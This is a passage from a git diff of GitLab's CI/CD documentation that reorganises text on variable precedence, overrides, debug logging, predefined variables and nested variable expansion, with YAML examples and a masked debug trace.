[variables](#custom-cicd-variables). +1. Group [variables](#group-cicd-variables). +1. Instance [variables](#instance-cicd-variables). +1. [Inherited variables](#pass-an-environment-variable-to-another-job). +1. Variables defined in jobs in the `.gitlab-ci.yml` file. +1. Variables defined outside of jobs (globally) in the `.gitlab-ci.yml` file. 1. [Deployment variables](#deployment-variables). -1. [Predefined CI/CD variables](predefined_variables.md). - -For example, if you define: - -- `API_TOKEN=secure` as a project variable. -- `API_TOKEN=yaml` in your `.gitlab-ci.yml`. - -`API_TOKEN` takes the value `secure` as the project -variables take precedence over those defined in `.gitlab-ci.yml`. - -## Unsupported variables - -Variable names are limited by the underlying shell used to execute scripts (see [available shells](https://docs.gitlab.com/runner/shells/index.html). -Each shell has its own unique set of reserved variable names. -Keep in mind the [scope of CI/CD variables](where_variables_can_be_used.md) to ensure a variable is defined in the scope in which you wish to use it. - -## Where variables can be used - -[This section](where_variables_can_be_used.md) describes where and how the different types of variables can be used. - -## Advanced use - -### Limit the environment scopes of CI/CD variables +1. [Predefined variables](predefined_variables.md). -You can limit the environment scope of a variable by -[defining which environments](../environments/index.md) it can be available for. +In the following example, when the script in `job1` executes, the value of `API_TOKEN` is `secure`. +Variables defined in jobs have a higher precedence than variables defined globally. -To learn more about scoping environments, see [Scoping environments with specs](../environments/index.md#scoping-environments-with-specs). +```yaml +variables: + API_TOKEN: "default" -### Deployment variables +job1: + variables: + API_TOKEN: "secure" + script: + - echo "The variable value is $API_TOKEN" +``` -> Introduced in GitLab 8.15. +## Override a defined CI/CD variable -[Integrations](../../user/project/integrations/overview.md) that are -responsible for deployment configuration may define their own variables that -are set in the build environment. These variables are only defined for -[deployment jobs](../environments/index.md). Please consult the documentation of -the integrations that you are using to learn which variables they define. +You can override the value of a variable when you: -An example integration that defines deployment variables is the -[Kubernetes integration](../../user/project/clusters/index.md#deployment-variables). +1. [Run a pipeline manually](#override-a-variable-when-running-a-pipeline-manually) in the UI. +1. Create a pipeline by using [the API](../../api/pipelines.md#create-a-new-pipeline). +1. Run a job manually in the UI. +1. Use [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd). +1. Trigger a pipeline by using [the API](../triggers/README.md#making-use-of-trigger-variables). +1. Pass variables to a [downstream pipeline](../multi_project_pipelines.md#passing-cicd-variables-to-a-downstream-pipeline). -### Auto DevOps environment variables +The pipeline variables declared in these events take [priority over other variables](#cicd-variable-precedence). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49056) in GitLab 11.7. +### Override a variable when running a pipeline manually -You can configure [Auto DevOps](../../topics/autodevops/index.md) to -pass CI/CD variables to the running application by prefixing the key of the -variable with `K8S_SECRET_`. +You can override the value of a CI/CD variable when you +[run a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). -These [prefixed variables](../../topics/autodevops/customize.md#application-secret-variables) are -then available as environment variables on the running application -container. +1. Go to your project's **CI/CD > Pipelines** and select **Run pipeline**. +1. Choose the branch you want to run the pipeline for. +1. Input the variable and its value in the UI. -WARNING: -Variables with multi-line values are not supported due to -limitations with the Auto DevOps scripting environment. +### Restrict who can override variables -### When you can override variables +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8. -You can override the value of a variable when: +You can grant permission to override variables to [maintainers](../../user/permissions.md#project-features) only. When other users try to run a pipeline +with overridden variables, they receive the `Insufficient permissions to set pipeline variables` +error message. -1. [Manually running](#override-a-variable-by-manually-running-a-pipeline) pipelines in the UI. -1. Manually creating pipelines [via API](../../api/pipelines.md#create-a-new-pipeline). -1. Manually playing a job via the UI. -1. Using [push options](../../user/project/push_options.md#push-options-for-gitlab-cicd). -1. Manually triggering pipelines with [the API](../triggers/README.md#making-use-of-trigger-variables). -1. Passing variables to a [downstream pipeline](../multi_project_pipelines.md#passing-cicd-variables-to-a-downstream-pipeline). +If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#custom-cicd-configuration-path), +use this setting for control over the environment the pipeline runs in. -These pipeline variables declared in these events take [priority over other variables](#priority-of-cicd-variables). +You can enable this feature by using [the projects API](../../api/projects.md#edit-project) +to enable the `restrict_user_defined_variables` setting. The setting is `disabled` by default. -#### Restrict who can override variables +## Limit the environment scope of a CI/CD variable -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/295234) in GitLab 13.8. - -To allow only users with Maintainer role to set these variables, you can use -[the API](../../api/projects.md#edit-project) to enable the project setting `restrict_user_defined_variables`. -When a user without Maintainer role tries to run a pipeline with overridden -variables, an `Insufficient permissions to set pipeline variables` error occurs. +You can limit the environment scope of a variable by +[defining which environments](../environments/index.md) it can be available for. -The setting is `disabled` by default. +To learn more about scoping environments, see [Scoping environments with specs](../environments/index.md#scoping-environments-with-specs). -If you [store your CI/CD configurations in a different repository](../../ci/pipelines/settings.md#custom-cicd-configuration-path), -use this setting for strict control over all aspects of the environment -the pipeline runs in. +## Deployment variables -#### Override a variable by manually running a pipeline +Integrations that are responsible for deployment configuration can define their own +variables that are set in the build environment. These variables are only defined +for [deployment jobs](../environments/index.md). -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/44059) in GitLab 10.8. +For example, the [Kubernetes integration](../../user/project/clusters/index.md#deployment-variables) +defines deployment variables that you can use with the integration. -You can override the value of a current variable by -[running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). +The [documentation for each integration](../../user/project/integrations/overview.md) +explains if the integration has any deployment variables available. -For instance, suppose you added a custom variable named `$TEST` -and you want to override it in a manual pipeline. +## Auto DevOps environment variables -Navigate to your project's **CI/CD > Pipelines** and click **Run pipeline**. -Choose the branch you want to run the pipeline for, then add a variable and its value in the UI: +> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/49056) in GitLab 11.7. - +You can configure [Auto DevOps](../../topics/autodevops/index.md) to pass CI/CD variables +to a running application. -The runner overrides the value previously set and uses the custom -value for this specific pipeline. +To make a CI/CD variable available as an environment variable in the running application's container, +[prefix the variable key](../../topics/autodevops/customize.md#application-secret-variables) +with `K8S_SECRET_`. - +CI/CD variables with multi-line values are not supported. ## CI/CD variable expressions @@ -649,7 +639,7 @@ value for this specific pipeline. > - [Expanded](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3 with [the `rules` keyword](../yaml/README.md#rules) Use variable expressions to limit which jobs are created -within a pipeline after changes are pushed to GitLab. +in a pipeline after changes are pushed to GitLab. In `.gitlab-ci.yml`, variable expressions work with both: @@ -774,11 +764,8 @@ so `&&` is evaluated before `||`. #### Parentheses -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/230938) in GitLab 13.3 -> - It's deployed behind a feature flag, enabled by default. -> - It's enabled on GitLab.com. -> - It's recommended for production use. -> - For GitLab self-managed instances, GitLab administrators can opt to [disable it](#enable-or-disable-parenthesis-support-for-variables). **(FREE SELF)** +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/230938) in GitLab 13.3. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/238174) in GitLab 13.5. It is possible to use parentheses to group conditions. Parentheses have the highest precedence of all operators. Expressions enclosed in parentheses are evaluated first, @@ -794,24 +781,6 @@ Examples: - `($VARIABLE1 =~ /^content.*/ || $VARIABLE2 =~ /thing$/) && $VARIABLE3` - `$CI_COMMIT_BRANCH == "my-branch" || (($VARIABLE1 == "thing" || $VARIABLE2 == "thing") && $VARIABLE3)` -##### Enable or disable parenthesis support for variables **(FREE SELF)** - -The feature is deployed behind a feature flag that is **enabled by default**. -[GitLab administrators with access to the GitLab Rails console](../../administration/feature_flags.md) -can opt to disable it for your instance. - -To disable it: - -```ruby -Feature.disable(:ci_if_parenthesis_enabled) -``` - -To enable it: - -```ruby -Feature.enable(:ci_if_parenthesis_enabled) -``` - ### Storing regular expressions in variables It is possible to store a regular expression in a variable, to be used for pattern matching. @@ -834,7 +803,7 @@ The available regular expression syntax is limited. See [related issue](https:// for more details. If needed, you can use a test pipeline to determine whether a regular expression works in a variable. The example below tests the `^mast.*` regular expression directly, -as well as from within a variable: +as well as from in a variable: ```yaml variables: @@ -857,44 +826,22 @@ testvariable: > Introduced in GitLab Runner 1.7. WARNING: -Enabling debug tracing can have severe security implications. The -output **will** contain the content of all your variables and any other -secrets! The output **will** be uploaded to the GitLab server and made visible -in job logs! - -By default, the runner hides most of the details of what it is doing when -processing a job. This behavior keeps job logs short, and prevents secrets -from being leaked into the log unless your script writes them to the screen. - -If a job isn't working as expected, this can make the problem difficult to -investigate; in these cases, you can enable debug tracing in `.gitlab-ci.yml`. -Available on GitLab Runner v1.7+, this feature enables the shell's execution log. This results in a verbose job log listing all commands that were run, variables that were set, and so on. +Debug logging can be a serious security risk. The output contains the content of +all variables and other secrets available to the job. The output is uploaded to the +GitLab server and visible in job logs. -Before enabling this, you should ensure jobs are visible to -[team members only](../../user/permissions.md#project-features). You should -also [erase](../jobs/index.md#view-jobs-in-a-pipeline) all generated job logs -before making them visible again. +You can use debug logging to help troubleshoot problems with pipeline configuration +or job scripts. Debug logging exposes job execution details that are usually hidden +by the runner and makes job logs more verbose. It also exposes all variables and secrets +available to the job. -### Restricted access to debug logging - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/213159) in GitLab 13.7. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292661) in GitLab 13.8. - -With restricted access to debug logging, only users with -[developer or higher permissions](../../user/permissions.md#project-members-permissions) -can view job logs when debug logging is enabled with a variable in: - -- The [`.gitlab-ci.yml` file](#gitlab-ciyml-defined-variables). -- The CI/CD variables set within the GitLab UI. - -WARNING: -If you add `CI_DEBUG_TRACE` as a local variable to your runners, debug logs are visible -to all users with access to job logs. The permission levels are not checked by Runner, -so you should make use of the variable in GitLab only. +Before you enable debug logging, make sure only [team members](../../user/permissions.md#project-features) +can view job logs. You should also [delete job logs](../jobs/index.md#view-jobs-in-a-pipeline) +with debug output before you make logs public again. ### Enable Debug logging -To enable debug logs (traces), set the `CI_DEBUG_TRACE` variable to `true`: +To enable debug logging (tracing), set the `CI_DEBUG_TRACE` variable to `true`: ```yaml job_name: @@ -902,11 +849,10 @@ job_name: CI_DEBUG_TRACE: "true" ``` -Example truncated output with `CI_DEBUG_TRACE` set to `true`: +Example output (truncated): ```shell ... - export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' @@ -941,10 +887,6 @@ if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then ++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ export CI_JOB_TOKEN=[MASKED] ++ CI_JOB_TOKEN=[MASKED] -++ export CI_BUILD_ID=379424655 -++ CI_BUILD_ID=379424655 -++ export CI_BUILD_TOKEN=[MASKED] -++ CI_BUILD_TOKEN=[MASKED] ++ export CI_REGISTRY_USER=gitlab-ci-token ++ CI_REGISTRY_USER=gitlab-ci-token ++ export CI_REGISTRY_PASSWORD=[MASKED] @@ -957,10 +899,6 @@ if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then ++ CI_JOB_STAGE=test ++ export CI_NODE_TOTAL=1 ++ CI_NODE_TOTAL=1 -++ export CI_BUILD_NAME=debug_trace -++ CI_BUILD_NAME=debug_trace -++ export CI_BUILD_STAGE=test -++ CI_BUILD_STAGE=test ++ export CI=true ++ CI=true ++ export GITLAB_CI=true @@ -975,16 +913,6 @@ if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then ++ CI_SERVER_PROTOCOL=https ++ export CI_SERVER_NAME=GitLab ++ CI_SERVER_NAME=GitLab -++ export CI_SERVER_VERSION=12.6.0-pre -++ CI_SERVER_VERSION=12.6.0-pre -++ export CI_SERVER_VERSION_MAJOR=12 -++ CI_SERVER_VERSION_MAJOR=12 -++ export CI_SERVER_VERSION_MINOR=6 -++ CI_SERVER_VERSION_MINOR=6 -++ export CI_SERVER_VERSION_PATCH=0 -++ CI_SERVER_VERSION_PATCH=0 -++ export CI_SERVER_REVISION=f4cc00ae823 -++ CI_SERVER_REVISION=f4cc00ae823 ++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ export CI_PROJECT_ID=17893 @@ -1029,55 +957,33 @@ if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then ++ CI_COMMIT_REF_NAME=master ++ export CI_COMMIT_REF_SLUG=master ++ CI_COMMIT_REF_SLUG=master -++ export CI_COMMIT_MESSAGE=s/CI/Runner -++ CI_COMMIT_MESSAGE=s/CI/Runner -++ export CI_COMMIT_TITLE=s/CI/Runner -++ CI_COMMIT_TITLE=s/CI/Runner -++ export CI_COMMIT_DESCRIPTION= -++ CI_COMMIT_DESCRIPTION= -++ export CI_COMMIT_REF_PROTECTED=true -++ CI_COMMIT_REF_PROTECTED=true -++ export CI_BUILD_REF=dd648b2e48ce6518303b0bb580b2ee32fadaf045 -++ CI_BUILD_REF=dd648b2e48ce6518303b0bb580b2ee32fadaf045 -++ export CI_BUILD_BEFORE_SHA=0000000000000000000000000000000000000000 -++ CI_BUILD_BEFORE_SHA=0000000000000000000000000000000000000000 -++ export CI_BUILD_REF_NAME=master -++ CI_BUILD_REF_NAME=master -++ export CI_BUILD_REF_SLUG=master -++ CI_BUILD_REF_SLUG=master -++ export CI_RUNNER_ID=1337 -++ CI_RUNNER_ID=1337 -++ export CI_RUNNER_DESCRIPTION=shared-runners-manager-4.gitlab.com -++ CI_RUNNER_DESCRIPTION=shared-runners-manager-4.gitlab.com -++ export 'CI_RUNNER_TAGS=gce, east-c, shared, docker, linux, ruby, mysql, postgres, mongo, git-annex' -++ CI_RUNNER_TAGS='gce, east-c, shared, docker, linux, ruby, mysql, postgres, mongo, git-annex' -++ export CI_DEBUG_TRACE=true -++ CI_DEBUG_TRACE=true -++ export GITLAB_USER_ID=42 -++ GITLAB_USER_ID=42 -++ export GITLAB_USER_EMAIL=user@example.com -++ GITLAB_USER_EMAIL=user@example.com -++ export GITLAB_USER_LOGIN=root -++ GITLAB_USER_LOGIN=root -++ export 'GITLAB_USER_NAME=User' -++ GITLAB_USER_NAME='User' -++ export CI_DISPOSABLE_ENVIRONMENT=true -++ CI_DISPOSABLE_ENVIRONMENT=true -++ export CI_RUNNER_VERSION=12.5.0 -++ CI_RUNNER_VERSION=12.5.0 -++ export CI_RUNNER_REVISION=577f813d -++ CI_RUNNER_REVISION=577f813d -++ export CI_RUNNER_EXECUTABLE_ARCH=linux/amd64 -++ CI_RUNNER_EXECUTABLE_ARCH=linux/amd64 -++ export VERY_SECURE_VARIABLE=imaverysecurevariable -++ VERY_SECURE_VARIABLE=imaverysecurevariable - ... ``` +### Restrict access to debug logging + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/213159) in GitLab 13.7. +> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292661) in GitLab 13.8. + +You can restrict access to debug logging. When restricted, only users with +[developer or higher permissions](../../user/permissions.md#project-members-permissions) +can view job logs when debug logging is enabled with a variable in: + +- The [`.gitlab-ci.yml` file](#create-a-custom-cicd-variable-in-the-gitlab-ciyml-file). +- The CI/CD variables set in the GitLab UI. + +WARNING: +If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible +to all users with access to job logs. The permission levels are not checked by the runner, +so you should only use the variable in GitLab itself. + ## Video walkthrough of a working example -The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments. +The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) +video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) +working example project. It explains how multiple levels of group CI/CD variables +can be combined with environment-scoped project variables for complex configuration +of application builds or deployments. The example can be copied to your own group or instance for testing. More details on what other GitLab CI patterns are demonstrated are available at the project page. diff --git a/doc/ci/variables/img/override_value_via_manual_pipeline_output.png b/doc/ci/variables/img/override_value_via_manual_pipeline_output.png Binary files differdeleted file mode 100644 index 2d4c4d24520..00000000000 --- a/doc/ci/variables/img/override_value_via_manual_pipeline_output.png +++ /dev/null diff --git a/doc/ci/variables/img/override_variable_manual_pipeline.png b/doc/ci/variables/img/override_variable_manual_pipeline.png Binary files differdeleted file mode 100644 index 2b242466297..00000000000 --- a/doc/ci/variables/img/override_variable_manual_pipeline.png +++ /dev/null diff --git a/doc/ci/variables/predefined_variables.md b/doc/ci/variables/predefined_variables.md index 9d598c43ef0..5ceab9c0ff3 100644 --- a/doc/ci/variables/predefined_variables.md +++ b/doc/ci/variables/predefined_variables.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# Predefined variables reference +# Predefined variables reference **(FREE)** Predefined [CI/CD variables](README.md) are available in every GitLab CI/CD pipeline. @@ -23,6 +23,7 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `CI` | all | 0.4 | Available for all jobs executed in CI/CD. `true` when available. | | `CI_API_V4_URL` | 11.7 | all | The GitLab API v4 root URL. | | `CI_BUILDS_DIR` | all | 11.10 | The top-level directory where builds are executed. | +| `CI_COMMIT_AUTHOR` | 13.11 | all | The author of the commit in `Name <email>` format. | | `CI_COMMIT_BEFORE_SHA` | 11.2 | all | The previous latest commit present on a branch. Is always `0000000000000000000000000000000000000000` in pipelines for merge requests. | | `CI_COMMIT_BRANCH` | 12.6 | 0.5 | The commit branch name. Available in branch pipelines, including pipelines for the default branch. Not available in merge request pipelines or tag pipelines. | | `CI_COMMIT_DESCRIPTION` | 10.8 | all | The description of the commit. If the title is shorter than 100 characters, the message without the first line. | @@ -59,7 +60,7 @@ There are also [Kubernetes-specific deployment variables](../../user/project/clu | `CI_JOB_NAME` | 9.0 | 0.5 | The name of the job. | | `CI_JOB_STAGE` | 9.0 | 0.5 | The name of the job's stage. | | `CI_JOB_STATUS` | all | 13.5 | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/README.md#after_script). Can be `success`, `failed`, or `canceled`. | -| `CI_JOB_TOKEN` | 9.0 | 1.2 | A token to authenticate with [certain API endpoints](../../api/README.md#gitlab-ci-job-token) or download [dependent repositories](../../user/project/new_ci_build_permissions_model.md#dependent-repositories). The token is valid as long as the job is running. | +| `CI_JOB_TOKEN` | 9.0 | 1.2 | A token to authenticate with [certain API endpoints](../../api/README.md#gitlab-cicd-job-token). The token is valid as long as the job is running. | | `CI_JOB_URL` | 11.1 | 0.5 | The job details URL. | | `CI_JOB_STARTED_AT` | 13.10 | all | The UTC datetime when a job started, in [ISO 8601](https://tools.ietf.org/html/rfc3339#appendix-A) format. | | `CI_KUBERNETES_ACTIVE` | 13.0 | all | Only available if the pipeline has a Kubernetes cluster available for deployments. `true` when available. | diff --git a/doc/ci/variables/where_variables_can_be_used.md b/doc/ci/variables/where_variables_can_be_used.md index 16c02b3482b..3e1518447d6 100644 --- a/doc/ci/variables/where_variables_can_be_used.md +++ b/doc/ci/variables/where_variables_can_be_used.md @@ -28,14 +28,14 @@ There are two places defined variables can be used. On the: | `environment:name` | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/><br/>- Variables that are based on the environment's name (`CI_ENVIRONMENT_NAME`, `CI_ENVIRONMENT_SLUG`).<br/>- Any other variables related to environment (currently only `CI_ENVIRONMENT_URL`).<br/>- [Persisted variables](#persisted-variables). | | `resource_group` | yes | GitLab | Similar to `environment:url`, but the variables expansion doesn't support the following:<br/><br/>- Variables that are based on the environment's name (`CI_ENVIRONMENT_NAME`, `CI_ENVIRONMENT_SLUG`).<br/>- Any other variables related to environment (currently only `CI_ENVIRONMENT_URL`).<br/>- [Persisted variables](#persisted-variables). | | `include` | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. <br/><br/>Predefined project variables are supported: `GITLAB_FEATURES`, `CI_DEFAULT_BRANCH`, and all variables that start with `CI_PROJECT_` (for example `CI_PROJECT_NAME`). | -| `variables` | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | +| `variables` | yes | GitLab/Runner | The variable expansion is first made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab, and then any unrecognized or unavailable variables are expanded by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). | | `image` | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `services:[]` | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `services:[]:name` | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `cache:key` | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism) | | `artifacts:name` | yes | Runner | The variable expansion is made by GitLab Runner's shell environment | | `script`, `before_script`, `after_script` | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment) | -| `only:variables:[]`, `except:variables:[]` | no | n/a | The variable must be in the form of `$variable`. Not supported are the following:<br/><br/>- Variables that are based on the environment's name (`CI_ENVIRONMENT_NAME`, `CI_ENVIRONMENT_SLUG`).<br/>- Any other variables related to environment (currently only `CI_ENVIRONMENT_URL`).<br/>- [Persisted variables](#persisted-variables). | +| `only:variables:[]`, `except:variables:[]`, `rules:if` | no | n/a | The variable must be in the form of `$variable`. Not supported are the following:<br/><br/>- Variables that are based on the environment's name (`CI_ENVIRONMENT_NAME`, `CI_ENVIRONMENT_SLUG`).<br/>- Any other variables related to environment (currently only `CI_ENVIRONMENT_URL`).<br/>- [Persisted variables](#persisted-variables). | ### `config.toml` file @@ -61,6 +61,54 @@ The expanded part needs to be in a form of `$variable`, or `${variable}` or `%va Each form is handled in the same way, no matter which OS/shell handles the job, because the expansion is done in GitLab before any runner gets the job. +#### Nested variable expansion + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48627) in GitLab 13.10. +> - It's [deployed behind a feature flag](../../user/feature_flags.md), disabled by default. +> - It can be enabled or disabled for a single project. +> - It's disabled on GitLab.com. +> - To use it in GitLab self-managed instances, ask a GitLab administrator to [enable it](#enabling-the-nested-variable-expansion-feature). **(FREE SELF)** + +GitLab expands job variable values recursively before sending them to the runner. For example: + +```yaml +- BUILD_ROOT_DIR: '${CI_BUILDS_DIR}' +- OUT_PATH: '${BUILD_ROOT_DIR}/out' +- PACKAGE_PATH: '${OUT_PATH}/pkg' +``` + +If nested variable expansion is: + +- **Disabled**: the runner receives `${BUILD_ROOT_DIR}/out/pkg`. This is not a valid path. +- **Enabled**: the runner receives a valid, fully-formed path. For example, if `${CI_BUILDS_DIR}` is `/output`, then `PACKAGE_PATH` would be `/output/out/pkg`. + +References to unavailable variables are left intact. In this case, the runner +[attempts to expand the variable value](#gitlab-runner-internal-variable-expansion-mechanism) at runtime. +For example, a variable like `CI_BUILDS_DIR` is known by the runner only at runtime. + +##### Enabling the nested variable expansion feature **(FREE SELF)** + +This feature comes with the `:variable_inside_variable` feature flag disabled by default. + +To enable this feature, ask a GitLab administrator with [Rails console access](../../administration/feature_flags.md#how-to-enable-and-disable-features-behind-flags) to run the +following command: + +```ruby +# For the instance +Feature.enable(:variable_inside_variable) +# For a single project +Feature.enable(:variable_inside_variable, Project.find(<project id>)) +``` + +To disable it: + +```ruby +# For the instance +Feature.disable(:variable_inside_variable) +# For a single project +Feature.disable(:variable_inside_variable, Project.find(<project id>)) +``` + ### GitLab Runner internal variable expansion mechanism - Supported: project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and @@ -70,16 +118,17 @@ because the expansion is done in GitLab before any runner gets the job. The runner uses Go's `os.Expand()` method for variable expansion. It means that it handles only variables defined as `$variable` and `${variable}`. What's also important, is that the expansion is done only once, so nested variables may or may not work, depending on the -ordering of variables definitions. +ordering of variables definitions, and whether [nested variable expansion](#nested-variable-expansion) +is enabled in GitLab. ### Execution shell environment -This is an expansion that takes place during the `script` execution. -How it works depends on the used shell (`bash`, `sh`, `cmd`, PowerShell). For example, if the job's +This is an expansion phase that takes place during the `script` execution. +Its behavior depends on the shell used (`bash`, `sh`, `cmd`, PowerShell). For example, if the job's `script` contains a line `echo $MY_VARIABLE-${MY_VARIABLE_2}`, it should be properly handled by bash/sh (leaving empty strings or some values depending whether the variables were defined or not), but don't work with Windows' `cmd` or PowerShell, since these shells -are using a different variables syntax. +use a different variables syntax. Supported: @@ -88,10 +137,10 @@ Supported: `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers and pipeline schedules). - The `script` may also use all variables defined in the lines before. So, for example, if you define a variable `export MY_VARIABLE="test"`: - - In `before_script`, it works in the following lines of `before_script` and + - In `before_script`, it works in the subsequent lines of `before_script` and all lines of the related `script`. - - In `script`, it works in the following lines of `script`. - - In `after_script`, it works in following lines of `after_script`. + - In `script`, it works in the subsequent lines of `script`. + - In `after_script`, it works in subsequent lines of `after_script`. In the case of `after_script` scripts, they can: @@ -99,7 +148,7 @@ In the case of `after_script` scripts, they can: section. - Not use variables defined in `before_script` and `script`. -These restrictions are because `after_script` scripts are executed in a +These restrictions exist because `after_script` scripts are executed in a [separated shell context](../yaml/README.md#after_script). ## Persisted variables diff --git a/doc/ci/yaml/README.md b/doc/ci/yaml/README.md index 9329748e396..49daa2b17fb 100644 --- a/doc/ci/yaml/README.md +++ b/doc/ci/yaml/README.md @@ -92,19 +92,19 @@ These job keywords can be defined inside a `default:` section: - [`tags`](#tags) - [`timeout`](#timeout) -The following example sets the `ruby:2.5` image as the default for all jobs in the pipeline. -The `rspec 2.6` job does not use the default, because it overrides the default with +The following example sets the `ruby:3.0` image as the default for all jobs in the pipeline. +The `rspec 2.7` job does not use the default, because it overrides the default with a job-specific `image:` section: ```yaml default: - image: ruby:2.5 + image: ruby:3.0 rspec: script: bundle exec rspec -rspec 2.6: - image: ruby:2.6 +rspec 2.7: + image: 